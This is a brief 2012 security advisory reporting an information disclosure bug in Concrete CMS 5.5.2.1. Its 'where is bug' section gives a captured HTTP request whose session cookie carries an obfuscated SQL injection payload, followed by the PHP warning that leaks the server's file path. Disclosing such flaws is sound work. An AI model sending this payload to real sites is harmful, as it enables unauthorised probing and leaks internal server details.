Concrete CMS 5.5.2.1 Information Disclosure

`[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug  
[ DATE ........ ][ 22.04.2012  
[ AUTOHR ...... ][ http://hauntit.blogspot.com  
[ SOFT LINK ... ][ http://www.concrete5.org/  
[ VERSION ..... ][ 5.5.2.1  
[ TESTED ON ... ][ LAMP  
[ ----------------------------------------------------------------------- [  
  
[ 1. What is this?  
[ 2. What is the type of vulnerability?  
[ 3. Where is bug :)  
[ 4. More...  
  
[--------------------------------------------[  
[ 1. What is this?  
This is very nice CMS, You should try it! ;)  
  
[--------------------------------------------[  
[ 2. What is the type of vulnerability?  
Information disclosure bug.  
  
[--------------------------------------------[  
[ 3. Where is bug :)  
(...raw cut from Burp...)  
  
GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0  
(...)  
Referer: http://concrete-host/concrete5.5.2.1/index.php/search/  
Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid  
Connection: close  
  
(...end cut...)  
  
Hm :)  
  
So answer is (for vulnerable php.ini of course):  
"  
  
  
<br />  
<b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]:   
The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and   
'-,' in <b>/www/concrete5.5.2.1/concrete/startup/session.php</b> on line <b>32</b><br />  
<!DOCTYPE html>  
<html lang="en">  
(...)  
"  
  
[--------------------------------------------[  
[ 4. More...  
  
- http://hauntit.blogspot.com  
- http://www.concrete5.org/  
- http://www.google.com  
- http://portswigger.net  
[  
[--------------------------------------------[  
[ Ask me about new projects @ mail. ;)  
]  
[ Best regards  
[   
  
`